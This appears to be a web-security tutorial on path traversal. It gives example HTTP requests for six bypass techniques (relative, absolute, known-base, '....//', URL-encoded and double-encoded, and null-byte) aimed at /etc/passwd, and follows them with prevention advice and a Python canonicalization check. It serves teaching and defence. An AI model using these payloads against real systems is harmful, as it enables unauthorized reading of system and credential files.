# Path Traversal

## Overview

Path traversal (also called directory traversal) is a web security vulnerability that allows an attacker to gain unauthorized access to files and directories stored outside the intended web root directory. It is typically possible when an application uses user-supplied input to construct file paths without canonicalizing and validating the result.

***

### Common Attack Variants

#### 1. **Relative Path Traversal**

Using `../` sequences to traverse directories upwards from the web root.

```http
GET /loadImage?filename=../../../etc/passwd
```

#### 2. **Absolute Path Traversal**

Providing an absolute path directly to a sensitive file.

```http
GET /loadImage?filename=/etc/passwd
```

#### 3. **Traversal from a Known Start Path**

If the application only checks that the supplied path begins with an expected base directory (e.g., `/var/www/images`), an attacker can still traverse out of it by appending `../` sequences:

```http
GET /loadImage?filename=/var/www/images/../../../etc/passwd
```

#### 4. **Traversal with Escaped Paths**

Using doubled or mixed-separator sequences that survive a single-pass filter: stripping `../` once from `....//` leaves `../` behind. Examples:

```http
GET /loadImage?filename=....//....//....//etc/passwd
GET /loadImage?filename=....\/....\/....\/etc/passwd
```

#### 5. **Traversal Using URL Encoding**

To bypass filters that look for the literal `../`, encode it:

* `%2e%2e%2f` (for `../`)
* `%252e%252e%252f` (double encoded)
* Other variants using non-standard or overlong UTF-8 encodings of `/`: `..%c0%af`, `..%ef%bc%8f`

```http
GET /loadImage?filename=..%252f..%252f..%252fetc/passwd
```

#### 6. **Null Byte Injection**

If file extensions are validated (e.g., `.png` required), a null byte `%00` may prematurely terminate the string once it reaches a C-based file API, so the extension check passes but the file actually opened is the one before the null byte:

```http
GET /loadImage?filename=../../../etc/passwd%00.png
```

***

### Prevention Techniques

1. **Disallow User-Controlled File Paths**
   * Do not use user input directly in file retrieval logic.
2. **Input Sanitization**
   * Strip path traversal sequences (`../`, `..\`, etc.) and their URL-encoded forms. A single pass is bypassed by `....//` as shown above, so either strip repeatedly until nothing changes or, preferably, reject the request outright.
3. **Restrict File Access**
   * Limit file access to predefined directories using strict whitelists.
4. **Use File Path Whitelisting**
   * Only allow access to known-safe files using a safelist.
5. **Run with Least Privilege**
   * Ensure the web server runs with permissions that prevent it from reading sensitive OS files.
6. **Canonicalization Before Validation**
   * Normalize the file path (resolve `..`, duplicate separators and symlinks against the base directory) before validating it, so that the containment check is made on where the path actually points rather than on how it was spelled, which closes the encoding and obfuscation bypasses.
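The canonicalize-then-validate check from item 6, as an added example that is not part of the original page. It models the `/loadImage?filename=` handler above with `/var/www/images` as an assumed web root, and `naive_strip_filter`, `resolve_safely` and `handle_request` are illustrative names.

```python
"""Added example (not from the page): canonicalize-then-validate for /loadImage.

BASE_DIR is an assumed web root; the function names are illustrative.
"""
import os
from typing import Optional
from urllib.parse import unquote

BASE_DIR = "/var/www/images"  # assumed web root of the image handler


def naive_strip_filter(filename: str) -> str:
    """Blacklist 'sanitization' that removes '../' in a single pass.

    '....//' collapses to '../' after one removal, which is exactly the
    bypass shown in the Escaped Paths variant above.
    """
    return filename.replace("../", "")


def resolve_safely(filename: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Return the canonical path of filename under base_dir, or None if it escapes.

    Containment is decided on the canonicalized filesystem path, so it does
    not matter how the traversal sequence was spelled in the request.
    """
    # A NUL byte would truncate the name in C file APIs (the %00.png trick);
    # os.path.realpath would also raise on it, so reject explicitly.
    if "\x00" in filename:
        return None
    base = os.path.realpath(base_dir)
    # os.path.join drops base_dir when filename is absolute (/etc/passwd),
    # and realpath resolves every '..' and symlink before the comparison.
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def handle_request(query_value: str) -> Optional[str]:
    """Simulate the framework's single URL-decode of the query value, then validate."""
    return resolve_safely(unquote(query_value))


if __name__ == "__main__":
    for raw in ("cat.png", "../../../etc/passwd", "/etc/passwd",
                "/var/www/images/../../../etc/passwd",
                "....//....//....//etc/passwd", "..%252f..%252f..%252fetc/passwd",
                "../../../etc/passwd%00.png"):
        print(f"{raw!r:42} -> {handle_request(raw)}")
    # Sanitize-then-check is the wrong order: the filter creates the payload.
    print(naive_strip_filter("....//....//....//etc/passwd"))
```

Note that `....//` and the double-encoded `%252f` form resolve to harmless names inside the base directory, because they only become `../` after a lossy filter or a second decode; if the server does perform that extra step, the check still rejects the resulting path.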

***

### Summary Examples

| Technique                               | Example URL                                     |
| --------------------------------------- | ----------------------------------------------- |
| Relative traversal                      | `?filename=../../../etc/passwd`                 |
| Absolute path                           | `?filename=/etc/passwd`                         |
| Null byte injection                     | `?filename=../../../etc/passwd%00.png`          |
| Encoded traversal                       | `?filename=%2E%2E%2Fetc%2Fpasswd`               |
| Known base path with relative traversal | `?filename=/var/www/images/../../../etc/passwd` |
| Escaped traversal                       | `?filename=....//....//etc/passwd`              |
